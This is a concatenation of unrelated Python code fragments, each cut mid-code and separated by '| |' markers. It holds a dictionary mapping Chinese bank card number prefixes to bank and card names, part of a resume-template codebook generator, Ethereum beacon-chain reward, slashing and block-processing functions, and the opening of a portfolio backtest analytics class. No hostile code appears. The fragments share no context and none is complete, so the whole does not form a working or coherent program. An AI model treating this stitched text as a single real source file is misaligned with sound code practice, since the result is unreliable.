'428911' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'436768' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'436769' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'487013' : u'广发银行股份有限公司-广发VISA信用卡-贷记卡',
'491032' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'491034' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'491035' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'491036' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'491037' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'491038' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'518364' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'520152' : u'广发银行股份有限公司-广发万事达信用卡-贷记卡',
'520382' : u'广发银行股份有限公司-广发万事达信用卡-贷记卡',
'548844' : u'广发银行股份有限公司-广发信用卡-贷记卡',
'552794' : u'广发银行股份有限公司-广发万事达信用卡-贷记卡',
'622555' : u'广发银行股份有限公司-广发银联标准金卡-贷记卡',
'622556' : u'广发银行股份有限公司-广发银联标准普卡-贷记卡',
'622557' : u'广发银行股份有限公司-广发银联标准真情金卡-贷记卡',
'622558' : u'广发银行股份有限公司-广发银联标准白金卡-贷记卡',
'622559' : u'广发银行股份有限公司-广发银联标准真情普卡-贷记卡',
'622560' : u'广发银行股份有限公司-广发真情白金卡-贷记卡',
'622568' : u'广发银行股份有限公司-广发理财通卡-借记卡',
'528931' : u'广发银行股份有限公司-广发万事达信用卡-贷记卡',
'9111' : u'广发银行股份有限公司-广发理财通(银联卡)-借记卡',
'558894' : u'广发银行股份有限公司-广发万事达信用卡-贷记卡',
'625072' : u'广发银行股份有限公司-银联标准金卡-贷记卡',
'625071' : u'广发银行股份有限公司-银联标准普卡-贷记卡',
'628260' : u'广发银行股份有限公司-银联公务金卡-贷记卡',
'628259' : u'广发银行股份有限公司-银联公务普卡-贷记卡',
'621462' : u'广发银行股份有限公司-理财通卡-借记卡',
'625805' : u'广发银行股份有限公司-银联真情普卡-贷记卡',
'625806' : u'广发银行股份有限公司-银联真情金卡-贷记卡',
'625807' : u'广发银行股份有限公司-银联真情白金卡-贷记卡',
'625808' : u'广发银行股份有限公司-银联标准普卡-贷记卡',
'625809' : u'广发银行股份有限公司-银联标准金卡-贷记卡',
'625810' : u'广发银行股份有限公司-银联标准白金卡-贷记卡',
'685800' : u'广发银行股份有限公司-广发万事达信用卡-贷记卡',
'620037' : u'广发银行股份有限公司-广发青年银行预付卡-预付费卡',
'6858000' : u'广发银行股份有限公司-广发理财通-贷记卡',
'6858001' : u'广发银行股份有限公司-广发理财通-借记卡',
'6858009' : u'广发银行股份有限公司-广发理财通-借记卡',
'623506' : u'广发银行股份有限公司-广发财富管理多币IC卡-借记卡',
'412963' : u'平安银行(借记卡)-发展借记卡-借记卡',
'415752' : u'平安银行(借记卡)-国际借记卡-借记卡',
'415753' : u'平安银行(借记卡)-国际借记卡-借记卡',
'622535' : u'平安银行(借记卡)-聚财卡金卡-借记卡',
'622536' : u'平安银行(借记卡)-聚财卡VIP金卡-借记卡',
'622538' : u'平安银行(借记卡)-发展卡(银联卡)-借记卡',
'622539' : u'平安银行(借记卡)-聚财卡白金卡和钻石卡-借记卡',
'998800' : u'平安银行(借记卡)-发展借记卡(银联卡)-借记卡',
'412962' : u'平安银行(借记卡)-发展借记卡-借记卡',
'622983' : u'平安银行(借记卡)-聚财卡钻石卡-借记卡',
'620010' : u'平安银行(借记卡)-公益预付卡-预付费卡',
'356885' : u'招商银行-招商银行信用卡-贷记卡',
'356886' : u'招商银行-招商银行信用卡-贷记卡',
'356887' : u'招商银行-招商银行信用卡-贷记卡',
'356888' : u'招商银行-招商银行信用卡-贷记卡',
'356890' : u'招商银行-招商银行信用卡-贷记卡',
'402658' : u'招商银行-两地一卡通-借记卡',
'410062' : u'招商银行-招行国际卡(银联卡)-借记卡',
'439188' : u'招商银行-招商银行信用卡-贷记卡',
'439227' : u'招商银行-VISA商务信用卡-贷记卡',
'468203' : u'招商银行-招行国际卡(银联卡)-借记卡',
'479228' : u'招商银行-招商银行信用卡-贷记卡',
'479229' : u'招商银行-招商银行信用卡-贷记卡',
'512425' : u'招商银行-招行国际卡(银联卡)-借记卡',
'521302' : u'招商银行-世纪金花联名信用卡-贷记卡',
'524011' : u'招商银行-招行国际卡(银联卡)-借记卡',
'356889' : u'招商银行-招商银行信用卡-贷记卡',
'545620' : u'招商银行-万事达信用卡-贷记卡',
'545621' : u'招商银行-万事达信用卡-贷记卡',
'545947' : u'招商银行-万事达信用卡-贷记卡',
'545948' : u'招商银行-万事达信用卡-贷记卡',
'552534' : u'招商银行-招商银行信用卡-贷记卡',
'552587' : u'招商银行-招商银行信用卡-贷记卡',
'622575' : u'招商银行-招商银行信用卡-贷记卡',
'622576' : u'招商银行-招商银行信用卡-贷记卡',
'622577' : u'招商银行-招商银行信用卡-贷记卡',
'622579' : u'招商银行-招商银行信用卡-贷记卡',
'622580' : u'招商银行-一卡通(银联卡)-借记卡',
'545619' : u'招商银行-万事达信用卡-贷记卡',
'622581' : u'招商银行-招商银行信用卡-贷记卡',
'622582' : u'招商银行-招商银行信用卡-贷记卡',
'622588' : u'招商银行-一卡通(银联卡)-借记卡',
'622598' : u'招商银行-公司卡(银联卡)-借记卡',
'622609' : u'招商银行-金卡-借记卡',
'690755' : u'招商银行-招行一卡通-借记卡',
'95555' : u'招商银行-一卡通(银联卡)-借记卡',
'545623' : u'招商银行-万事达信用卡-贷记卡',
'621286' : u'招商银行-金葵花卡-借记卡',
'620520' : u'招商银行-电子现金卡-预付费卡',
'621483' : u'招商银行-银联IC普卡-借记卡',
'621485' : u'招商银行-银联IC金卡-借记卡',
| |
+ str(line_number) + ": " + inFile_strings[line_number] + " This program is scanning through each line in the template, and expects to find an ID as the second token on this line #" + i + ": " + currentLine)
print("but there are only " + len(temp) + " tokens on the line.")
return -48, '', ''
myLabel = temp[1]
myLabel_strings = myLabel.split('-')
if (len(myLabel_strings) > len(parentLabel_strings) and
(all([myLabel_strings[j] == parentLabel_strings[j] for j in range(len(parentLabel_strings))])) and
(myLabel_strings[len(parentLabel_strings)] > first_added_label_strings[len(parentLabel_strings)])):
myLabel_strings[len(parentLabel_strings)] = str(int(myLabel_strings[len(parentLabel_strings)]) + num_added_sections)
temp[1] = '-'.join(myLabel_strings)
inFile_strings[i] = ' '.join(temp) + "\n"
if (myText == "*dependent*"):
if (len(temp) < 5):
print("Error! While updating the file fragment '" + match_object.group(1) + "' for line #" + str(line_number) + ": " + inFile_strings[line_number] + " This program is scanning through each line in the template, and expects to find the ID of the master section as the fifth token on this line #" + i + ": " + currentLine)
print("but there are only " + len(temp) + " tokens on the line.")
return -49, '', ''
master = temp[4]
master_strings = master.split('-')
if (len(master_strings) > len(parentLabel_strings) and
(all([master_strings[j] == parentLabel_strings[j] for j in range(len(parentLabel_strings))])) and
(master_strings[len(parentLabel_strings)] > first_added_label_strings[len(parentLabel_strings)])):
master_strings[len(parentLabel_strings)] = str(int(master_strings[len(parentLabel_strings)]) + num_added_sections)
temp[4] = '-'.join(master_strings)
inFile_strings[i] = ' '.join(temp) + "\n"
else:
if ("%next%" in currentLine):
next_strings = currentLine.split('%')
for next_index in range(len(next_strings) - 1):
if (next_strings[next_index] == "next"):
myLabel = next_strings[next_index+1]
myLabel_strings = myLabel.split('-')
if (len(myLabel_strings) > len(parentLabel_strings) and
(all([myLabel_strings[j] == parentLabel_strings[j] for j in range(len(parentLabel_strings))])) and
(myLabel_strings[len(parentLabel_strings)] > first_added_label_strings[len(parentLabel_strings)])):
myLabel_strings[len(parentLabel_strings)] = str(int(myLabel_strings[len(parentLabel_strings)]) + num_added_sections)
next_strings[next_index+1] = '-'.join(myLabel_strings)
inFile_strings[i] = '%'.join(next_strings)
inFile_strings = inFile_strings[0:leaf_line_number] + fragment_strings + inFile_strings[(end_leaf_line_number+1):]
return 1, inFile_strings, num_fragments_replaced
def printCodebookToTempFile(inFile):
"""
Prints the codebook to a temporary file.
"""
global globalOutputEncoding
try:
tempFile = tempfile.TemporaryFile('w+t', encoding=globalOutputEncoding)
except:
print("Error creating a temporary file to hold the codebook! Encoding is: ", globalOutputEncoding)
return -68, None
inFile.seek(0)
theLine = inFile.readline() #skip gui version
theLine = inFile.readline()
makeCodeBook = True
startString = "%start%"
endString = "%end%"
currentString = "%current%"
currentPlusIntervalString = "%currentPlusInterval%"
print("Parent Section\tLeaf\tText", file=tempFile)
lineNumber = 2
while theLine: #readline returns an empty string when it reaches EOF
currentLine = theLine
if logging: print(currentLine, end='')
temp = currentLine.rstrip('\n').split(" ")
if logging: print(temp)
if (len(temp)<2):
print("\nPortion of template (after inserting fragments), with line numbers:")
inFile.seek(0)
theLine = inFile.readline()
outputLineNumber = 1
while theLine:
if (outputLineNumber + 7 > lineNumber) and (lineNumber + 7 > outputLineNumber):
sys.stdout.write(str(outputLineNumber) + ":" + theLine)
theLine = inFile.readline()
outputLineNumber += 1
print("\nError! While reading through the template to print the codebook, the software expected a start tag (e.g., *random* 3-2 4) on line number " + str(lineNumber) + " (see print out with line numbers above) but got: "+currentLine)
print("Make sure the lines (in the template file) that contain start tags for Random and Constant and Dependent sections specify the correct number of subsections listed after the label (following the second space in the line), that each end tag is directly followed by either a start tag or an end tag, that there are no blank lines in the template file outside of Leaf sections, and that all fragments use the start/end tag texts '*leaf*' and '*end_leaf*' exactly and with no spaces on the same lines. Also look at the surrounding lines to see if a fragment does not have the correct text for a start/end tag.")
return -38, tempFile
myText = temp[0]
myLabel = temp[1]
if "*leaf*" in myText:
splitLabel = myLabel.split("-")
myParent = '-'.join(splitLabel[:-1])
parentString = "v" + myParent.replace("-", "_")
if (parentString == "v"): parentString = "-"
print(parentString + "\t" + splitLabel[-1] + "\t", file=tempFile, end='')
if logging: print("leaf text: \t", end='')
retval = writeLeaf(inFile, tempFile, currentLine, myLabel, startString, endString, currentString, currentPlusIntervalString, makeCodeBook)
if (retval < 1):
return retval
lineNumber += retval
if logging: print("")
print("", file=tempFile)
if (myParent == ''): break # We've come to the end of the template...the top level section was a Leaf.
if "*end_" in myText and myLabel == '1': # We've come to the end of the template
break
theLine = inFile.readline()
lineNumber += 1
return 1, tempFile
def printCodebook(inFile, filename):
"""
Prints the codebook, if it does not exist or has changed.
"""
print("Checking whether codebook already exists.")
returnVal, tempFile = printCodebookToTempFile(inFile)
if returnVal < 0: return returnVal
#is this codebook the same as the latest one?
codebookPrefix = filename + "_codebook-"
prevCodebookNames = glob.glob(codebookPrefix + "*.xls")
saveCodebook = True
if (len(prevCodebookNames) == 0):
print("No previous codebook was found in the folder.")
else:
latestCodebookName = max(prevCodebookNames, key=os.path.getmtime)
success, latestCodebook, encoding = openInputFile(latestCodebookName)
if (not success):
print()
print("Warning, failed to compare previous codebook with new codebook! Saving new codebook even though it might have the same content.")
print(e)
else:
saveCodebook = False
tempFile.flush()
tempFile.seek(0)
aLine = tempFile.readline()
while aLine:
if (aLine != latestCodebook.readline()):
saveCodebook = True
break
aLine = tempFile.readline()
if not saveCodebook:
#If the new set of leaf texts is exactly the same as before except missing lines at the end, the previous check won't find the difference. We must compare the other way so a shortened codebook is noticed.
tempFile.seek(0)
latestCodebook.seek(0)
aLine = latestCodebook.readline()
while aLine:
otherLine = tempFile.readline()
if (aLine != otherLine):
saveCodebook = True
break
aLine = latestCodebook.readline()
latestCodebook.close()
if saveCodebook:
print()
print("Warning! The template does not match the latest codebook file: " + latestCodebookName)
print("One (or both) of the template or the codebook have been modified.")
print("A new codebook file will be created for the files being generated now.")
input('Press return to continue')
if saveCodebook:
codebookNumber = 1
while True:
codebookFilename = codebookPrefix + str(codebookNumber) + ".xls"
if not os.path.isfile(codebookFilename):
break
codebookNumber += 1
print("Saving new codebook in a file named " + codebookFilename)
try:
codebookFile = open(codebookFilename, 'wt', encoding=globalOutputEncoding)
except IOError as e:
print()
print("Error creating codebook file named " + codebookFilename)
print(e)
return -52
tempFile.seek(0)
try:
shutil.copyfileobj(tempFile, codebookFile)
except UnicodeError:
print()
print("Error! Failed to copy the codebook into the file due to encoding issues.")
print(e)
return -66
tempFile.close()
codebookFile.close()
print("Done saving the codebook.")
print()
else:
print("The codebook for this template already exists in " + latestCodebookName)
return 1
def createResumes(filename):
"""
Creates resumes from the template filename.
"""
success, inFile, encoding = openInputFile(filename)
if (not success):
print()
print("Error! Failed to open the template file!")
return -67
global globalInputEncodings;
globalInputEncodings = [(filename, encoding)]
matchedPair = False
guiVersion = inFile.readline()
guiVersion_text = " ".join(guiVersion.split(" ")[1:4])
if (guiVersion_text.rstrip("\n") != "gui version number"):
print("Error! The file selected as a template " + filename + " does not have the correct text starting its first line: '" + str(Version) + " gui version number'")
print("Instead, the first line is '" + guiVersion + "'")
return -53
for line in inFile:
if ('*matchDifferent*' in line) or ('*matchSame*' in line) or ('*matchOnlyOneEver*' in line) or ('*matchMaxSelectionsPerSubPoint*' in line):
matchedPair = True
break
numDifferent = 1
if matchedPair:
while True:
try: numDifferent = int(input('This template file contains random sections for Matched "pairs". How many files should be matched in each batch? (0 to cancel) '))
except ValueError:
print("Please enter a positive integer.")
continue
if numDifferent < 1:
print("Canceled")
return -1
break
while True:
try:
if matchedPair:
numToMake = int(input('How many batches of matched resumes should be generated? (0 to cancel) '))
else:
numToMake = int(input('How many resumes should be generated? (0 to cancel) '))
break
except ValueError:
print("Please enter an integer.")
continue
if (numToMake < 1):
print("Canceled")
return -1
print()
myTime = ""
withTime = input('Would you like the date & time in each resume filename? (Y/n, anything else to cancel) ')
if (not withTime) or (withTime.lower() == 'y') or (withTime.lower() == 'yes'):
myTime = strftime("_%Y-%m-%d-%H-%M-%S")
elif (withTime.lower() != 'n') and (withTime.lower() != 'no'):
print("Canceled")
return -1
print()
inFile.seek(0)
inFile_strings = inFile.readlines()
replaced_fragments = 1
num_fragments = -1
have_printed_warning | |
0b1
matching_target_attestations = get_matching_target_attestations(state, current_epoch) # Current epoch
if get_attesting_balance(state, matching_target_attestations) * 3 >= get_total_active_balance(state) * 2:
state.current_justified_checkpoint = Checkpoint(epoch=current_epoch,
root=get_block_root(state, current_epoch))
state.justification_bits[0] = 0b1
# Process finalizations
bits = state.justification_bits
# The 2nd/3rd/4th most recent epochs are justified, the 2nd using the 4th as source
if all(bits[1:4]) and old_previous_justified_checkpoint.epoch + 3 == current_epoch:
state.finalized_checkpoint = old_previous_justified_checkpoint
# The 2nd/3rd most recent epochs are justified, the 2nd using the 3rd as source
if all(bits[1:3]) and old_previous_justified_checkpoint.epoch + 2 == current_epoch:
state.finalized_checkpoint = old_previous_justified_checkpoint
# The 1st/2nd/3rd most recent epochs are justified, the 1st using the 3rd as source
if all(bits[0:3]) and old_current_justified_checkpoint.epoch + 2 == current_epoch:
state.finalized_checkpoint = old_current_justified_checkpoint
# The 1st/2nd most recent epochs are justified, the 1st using the 2nd as source
if all(bits[0:2]) and old_current_justified_checkpoint.epoch + 1 == current_epoch:
state.finalized_checkpoint = old_current_justified_checkpoint
def get_base_reward(state: BeaconState, index: ValidatorIndex) -> Gwei:
total_balance = get_total_active_balance(state)
effective_balance = state.validators[index].effective_balance
return Gwei(effective_balance * BASE_REWARD_FACTOR // integer_squareroot(total_balance) // BASE_REWARDS_PER_EPOCH)
def get_proposer_reward(state: BeaconState, attesting_index: ValidatorIndex) -> Gwei:
return Gwei(get_base_reward(state, attesting_index) // PROPOSER_REWARD_QUOTIENT)
def get_finality_delay(state: BeaconState) -> uint64:
return get_previous_epoch(state) - state.finalized_checkpoint.epoch
def is_in_inactivity_leak(state: BeaconState) -> bool:
return get_finality_delay(state) > MIN_EPOCHS_TO_INACTIVITY_PENALTY
def get_eligible_validator_indices(state: BeaconState) -> Sequence[ValidatorIndex]:
previous_epoch = get_previous_epoch(state)
return [
ValidatorIndex(index) for index, v in enumerate(state.validators)
if is_active_validator(v, previous_epoch) or (v.slashed and previous_epoch + 1 < v.withdrawable_epoch)
]
def get_attestation_component_deltas(state: BeaconState,
attestations: Sequence[PendingAttestation]
) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Helper with shared logic for use by get source, target, and head deltas functions
"""
rewards = [Gwei(0)] * len(state.validators)
penalties = [Gwei(0)] * len(state.validators)
total_balance = get_total_active_balance(state)
unslashed_attesting_indices = get_unslashed_attesting_indices(state, attestations)
attesting_balance = get_total_balance(state, unslashed_attesting_indices)
for index in get_eligible_validator_indices(state):
if index in unslashed_attesting_indices:
increment = EFFECTIVE_BALANCE_INCREMENT # Factored out from balance totals to avoid uint64 overflow
if is_in_inactivity_leak(state):
# Since full base reward will be canceled out by inactivity penalty deltas,
# optimal participation receives full base reward compensation here.
rewards[index] += get_base_reward(state, index)
else:
reward_numerator = get_base_reward(state, index) * (attesting_balance // increment)
rewards[index] += reward_numerator // (total_balance // increment)
else:
penalties[index] += get_base_reward(state, index)
return rewards, penalties
def get_source_deltas(state: BeaconState) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Return attester micro-rewards/penalties for source-vote for each validator.
"""
matching_source_attestations = get_matching_source_attestations(state, get_previous_epoch(state))
return get_attestation_component_deltas(state, matching_source_attestations)
def get_target_deltas(state: BeaconState) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Return attester micro-rewards/penalties for target-vote for each validator.
"""
matching_target_attestations = get_matching_target_attestations(state, get_previous_epoch(state))
return get_attestation_component_deltas(state, matching_target_attestations)
def get_head_deltas(state: BeaconState) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Return attester micro-rewards/penalties for head-vote for each validator.
"""
matching_head_attestations = get_matching_head_attestations(state, get_previous_epoch(state))
return get_attestation_component_deltas(state, matching_head_attestations)
def get_inclusion_delay_deltas(state: BeaconState) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Return proposer and inclusion delay micro-rewards/penalties for each validator.
"""
rewards = [Gwei(0) for _ in range(len(state.validators))]
matching_source_attestations = get_matching_source_attestations(state, get_previous_epoch(state))
for index in get_unslashed_attesting_indices(state, matching_source_attestations):
attestation = min([
a for a in matching_source_attestations
if index in get_attesting_indices(state, a.data, a.aggregation_bits)
], key=lambda a: a.inclusion_delay)
rewards[attestation.proposer_index] += get_proposer_reward(state, index)
max_attester_reward = get_base_reward(state, index) - get_proposer_reward(state, index)
rewards[index] += Gwei(max_attester_reward // attestation.inclusion_delay)
# No penalties associated with inclusion delay
penalties = [Gwei(0) for _ in range(len(state.validators))]
return rewards, penalties
def get_inactivity_penalty_deltas(state: BeaconState) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Return inactivity reward/penalty deltas for each validator.
"""
penalties = [Gwei(0) for _ in range(len(state.validators))]
if is_in_inactivity_leak(state):
matching_target_attestations = get_matching_target_attestations(state, get_previous_epoch(state))
matching_target_attesting_indices = get_unslashed_attesting_indices(state, matching_target_attestations)
for index in get_eligible_validator_indices(state):
# If validator is performing optimally this cancels all rewards for a neutral balance
base_reward = get_base_reward(state, index)
penalties[index] += Gwei(BASE_REWARDS_PER_EPOCH * base_reward - get_proposer_reward(state, index))
if index not in matching_target_attesting_indices:
effective_balance = state.validators[index].effective_balance
penalties[index] += Gwei(effective_balance * get_finality_delay(state) // INACTIVITY_PENALTY_QUOTIENT)
# No rewards associated with inactivity penalties
rewards = [Gwei(0) for _ in range(len(state.validators))]
return rewards, penalties
def get_attestation_deltas(state: BeaconState) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Return attestation reward/penalty deltas for each validator.
"""
source_rewards, source_penalties = get_source_deltas(state)
target_rewards, target_penalties = get_target_deltas(state)
head_rewards, head_penalties = get_head_deltas(state)
inclusion_delay_rewards, _ = get_inclusion_delay_deltas(state)
_, inactivity_penalties = get_inactivity_penalty_deltas(state)
rewards = [
source_rewards[i] + target_rewards[i] + head_rewards[i] + inclusion_delay_rewards[i]
for i in range(len(state.validators))
]
penalties = [
source_penalties[i] + target_penalties[i] + head_penalties[i] + inactivity_penalties[i]
for i in range(len(state.validators))
]
return rewards, penalties
def process_rewards_and_penalties(state: BeaconState) -> None:
if get_current_epoch(state) == GENESIS_EPOCH:
return
rewards, penalties = get_attestation_deltas(state)
for index in range(len(state.validators)):
increase_balance(state, ValidatorIndex(index), rewards[index])
decrease_balance(state, ValidatorIndex(index), penalties[index])
def process_registry_updates(state: BeaconState) -> None:
# Process activation eligibility and ejections
for index, validator in enumerate(state.validators):
if is_eligible_for_activation_queue(validator):
validator.activation_eligibility_epoch = get_current_epoch(state) + 1
if is_active_validator(validator, get_current_epoch(state)) and validator.effective_balance <= EJECTION_BALANCE:
initiate_validator_exit(state, ValidatorIndex(index))
# Queue validators eligible for activation and not yet dequeued for activation
activation_queue = sorted([
index for index, validator in enumerate(state.validators)
if is_eligible_for_activation(state, validator)
# Order by the sequence of activation_eligibility_epoch setting and then index
], key=lambda index: (state.validators[index].activation_eligibility_epoch, index))
# Dequeued validators for activation up to churn limit
for index in activation_queue[:get_validator_churn_limit(state)]:
validator = state.validators[index]
validator.activation_epoch = compute_activation_exit_epoch(get_current_epoch(state))
def process_slashings(state: BeaconState) -> None:
epoch = get_current_epoch(state)
total_balance = get_total_active_balance(state)
for index, validator in enumerate(state.validators):
if validator.slashed and epoch + EPOCHS_PER_SLASHINGS_VECTOR // 2 == validator.withdrawable_epoch:
increment = EFFECTIVE_BALANCE_INCREMENT # Factored out from penalty numerator to avoid uint64 overflow
penalty_numerator = validator.effective_balance // increment * min(sum(state.slashings) * 3, total_balance)
penalty = penalty_numerator // total_balance * increment
decrease_balance(state, ValidatorIndex(index), penalty)
def process_final_updates(state: BeaconState) -> None:
current_epoch = get_current_epoch(state)
next_epoch = Epoch(current_epoch + 1)
# Reset eth1 data votes
if next_epoch % EPOCHS_PER_ETH1_VOTING_PERIOD == 0:
state.eth1_data_votes = []
# Update effective balances with hysteresis
for index, validator in enumerate(state.validators):
balance = state.balances[index]
HYSTERESIS_INCREMENT = EFFECTIVE_BALANCE_INCREMENT // HYSTERESIS_QUOTIENT
DOWNWARD_THRESHOLD = HYSTERESIS_INCREMENT * HYSTERESIS_DOWNWARD_MULTIPLIER
UPWARD_THRESHOLD = HYSTERESIS_INCREMENT * HYSTERESIS_UPWARD_MULTIPLIER
if (
balance + DOWNWARD_THRESHOLD < validator.effective_balance
or validator.effective_balance + UPWARD_THRESHOLD < balance
):
validator.effective_balance = min(balance - balance % EFFECTIVE_BALANCE_INCREMENT, MAX_EFFECTIVE_BALANCE)
# Reset slashings
state.slashings[next_epoch % EPOCHS_PER_SLASHINGS_VECTOR] = Gwei(0)
# Set randao mix
state.randao_mixes[next_epoch % EPOCHS_PER_HISTORICAL_VECTOR] = get_randao_mix(state, current_epoch)
# Set historical root accumulator
if next_epoch % (SLOTS_PER_HISTORICAL_ROOT // SLOTS_PER_EPOCH) == 0:
historical_batch = HistoricalBatch(block_roots=state.block_roots, state_roots=state.state_roots)
state.historical_roots.append(hash_tree_root(historical_batch))
# Rotate current/previous epoch attestations
state.previous_epoch_attestations = state.current_epoch_attestations
state.current_epoch_attestations = []
def process_block(state: BeaconState, block: BeaconBlock) -> None:
process_block_header(state, block)
process_randao(state, block.body)
process_eth1_data(state, block.body)
process_operations(state, block.body)
def process_block_header(state: BeaconState, block: BeaconBlock) -> None:
# Verify that the slots match
assert block.slot == state.slot
# Verify that the block is newer than latest block header
assert block.slot > state.latest_block_header.slot
# Verify that proposer index is the correct index
assert block.proposer_index == get_beacon_proposer_index(state)
# Verify that the parent matches
assert block.parent_root == hash_tree_root(state.latest_block_header)
# Cache current block as the new latest block
state.latest_block_header = BeaconBlockHeader(
slot=block.slot,
proposer_index=block.proposer_index,
parent_root=block.parent_root,
state_root=Bytes32(), # Overwritten in the next process_slot call
body_root=hash_tree_root(block.body),
)
# Verify proposer is not slashed
proposer = state.validators[block.proposer_index]
assert not proposer.slashed
def process_randao(state: BeaconState, body: BeaconBlockBody) -> None:
epoch = get_current_epoch(state)
# Verify RANDAO reveal
proposer = state.validators[get_beacon_proposer_index(state)]
signing_root = compute_signing_root(epoch, get_domain(state, DOMAIN_RANDAO))
assert bls.Verify(proposer.pubkey, signing_root, body.randao_reveal)
# Mix in RANDAO reveal
mix = xor(get_randao_mix(state, epoch), hash(body.randao_reveal))
state.randao_mixes[epoch % EPOCHS_PER_HISTORICAL_VECTOR] = mix
def process_eth1_data(state: BeaconState, body: BeaconBlockBody) -> None:
state.eth1_data_votes.append(body.eth1_data)
if state.eth1_data_votes.count(body.eth1_data) * 2 > EPOCHS_PER_ETH1_VOTING_PERIOD * SLOTS_PER_EPOCH:
state.eth1_data = body.eth1_data
def process_operations(state: BeaconState, body: BeaconBlockBody) -> None:
# Verify that outstanding deposits are processed up to the maximum number of deposits
# assert len(body.deposits) == min(MAX_DEPOSITS, state.eth1_data.deposit_count - state.eth1_deposit_index)
def for_ops(operations: Sequence[Any], fn: Callable[[BeaconState, Any], None]) -> None:
for operation in operations:
fn(state, operation)
for_ops(body.proposer_slashings, process_proposer_slashing)
for_ops(body.attester_slashings, process_attester_slashing)
for_ops(body.attestations, process_attestation)
for_ops(body.deposits, process_deposit)
for_ops(body.voluntary_exits, process_voluntary_exit)
def process_proposer_slashing(state: BeaconState, proposer_slashing: ProposerSlashing) -> None:
header_1 = proposer_slashing.signed_header_1.message
header_2 = proposer_slashing.signed_header_2.message
# Verify header slots match
assert header_1.slot == header_2.slot
# Verify header proposer indices match
assert header_1.proposer_index == header_2.proposer_index
# Verify the headers are different
assert header_1 != header_2
# Verify the proposer is slashable
proposer = state.validators[header_1.proposer_index]
assert is_slashable_validator(proposer, get_current_epoch(state))
# Verify signatures
for signed_header in (proposer_slashing.signed_header_1, proposer_slashing.signed_header_2):
domain = get_domain(state, DOMAIN_BEACON_PROPOSER, compute_epoch_at_slot(signed_header.message.slot))
signing_root = compute_signing_root(signed_header.message, domain)
assert bls.Verify(proposer.pubkey, signing_root, signed_header.signature)
slash_validator(state, header_1.proposer_index)
def process_attester_slashing(state: BeaconState, attester_slashing: AttesterSlashing) -> None:
attestation_1 = attester_slashing.attestation_1
attestation_2 = attester_slashing.attestation_2
assert is_slashable_attestation_data(attestation_1.data, attestation_2.data)
assert is_valid_indexed_attestation(state, attestation_1)
assert is_valid_indexed_attestation(state, attestation_2)
slashed_any = False
indices = set(attestation_1.attesting_indices).intersection(attestation_2.attesting_indices)
for index in sorted(indices):
if is_slashable_validator(state.validators[index], get_current_epoch(state)):
slash_validator(state, index)
slashed_any = True
assert slashed_any
def process_attestation(state: BeaconState, attestation: Attestation) -> None:
data = attestation.data
assert data.index < get_committee_count_at_slot(state, data.slot)
assert data.target.epoch | |
# -*- coding: utf-8 -*-
"""
TopGun Backtest Class
@author: David
"""
# %% IMPORTs CELL
# Default Imports
import numpy as np
import pandas as pd
# Plotly for charting
import plotly.express as px
import plotly.graph_objs as go
import plotly.io as pio
# %% CLASS MODULE
class BacktestAnalytics(object):
""" Backtest Analytics & Reporting for Timeseries Data
Here we take one or more portfolios (strategies) timeseries returns and
run various tests vs. against a specified becnhmark timeseries. There is
an option to provide multiple benchmark returns in the bmkrtns dataframe;
at the moment only one benchmark is used as a direct comparitor but those
other indices will be used as part of a correlation analysis.
NB/ THIS DOES NOT MANAGE STOCK LEVEL ANALYSIS - ONLY TIMESERIES
INPUTS:
portrtns: pd.DataFrame (or pd.Series) of timeseries returns or prices;
if using prices must add ports_as_rtns=False
bmkrtns: same conditions as portrtns (& using bmks_as_rtns)
benchmark (OPTIONAL): str() as column name in bmkrtns dataframe. If
not provided a vector of zeros is used as the benchmark returns
eom: True(default)|False will converts all input dates to end-of-month
freq: 12(default) is the periods per annum. Currently only works monthly
MAIN FUNCTIONS:
run_backtest():
* builds data from portrtns, bmkrtns & benchmark
* creates full period summary table
* builds and stores rolling vol, TE, IR, etc..
* builds & saves drawdown series and analyses individual drawdowns
* creates wider correlation matrix inc. xs_rtns
plot_master():
* creates dictionary of useful plots
pretty_panda():
* applies basic styling to a pandas table - this could move
* bespoke sub funcs extend this; these funcs start "pretty_panda_xxx"
REPORTING:
In all cases we produce a templated markdown script with Plotly plots
already embedded as HTML - these can be fed to report_writer or anything
which turns markdown to a static html/pdf.
- markdown_doc() is primary function for generating markdown. REQUIRES
plot_master() to have been run but will prettify dataframe itself.
DEVELOPMENT:
- dynamic plots for correlation wrt time
- more work on hit-rates
- PCA based analysis
- basic checking that input benchmarks or Rf in bmkrtns columns
Author: <NAME>
"""
def __init__(self, portrtns, bmkrtns,
benchmark=None, Rf=None,
eom = True, freq=12,
ports_as_rtns=True, bmks_as_rtns=True):
# ingest portfolio (strategy) and benchmark returns
# check if supplied data is as returns or prices
# if prices convert to returns
self.portrtns = portrtns if ports_as_rtns else portrtns.pct_change()
self.bmkrtns = bmkrtns if bmks_as_rtns else bmkrtns.pct_change()
# convert to end-of-month dates if required
# if we do this at the initialisation stage we know all else is eom
if eom:
self.portrtns = self._eom(self.portrtns)
self.bmkrtns = self._eom(self.bmkrtns)
# Name of benchmark - should match column name in bmkrtns
# Similarly the "Risk-Free" component if being provided
self.Rb = benchmark
self.Rf = Rf
# Other options
self.freq = freq # Assume 12 for monthly
# Other setup things
self.rolling = dict() # blank dictionary for rolling window frames
# Plotly template
colourmap = ['black', 'teal', 'purple', 'grey', 'deeppink', 'skyblue', 'lime', 'green','darkorange', 'gold', 'navy', 'darkred',]
fig = go.Figure(layout=dict(
font={'family':'Garamond', 'size':14},
plot_bgcolor= 'white',
colorway=colourmap,
showlegend=True,
legend={'orientation':'v'},
margin = {'l':75, 'r':50, 'b':25, 't':50},
xaxis= {'anchor': 'y1', 'title': '', 'hoverformat':'.1f', 'tickformat':'.0f',
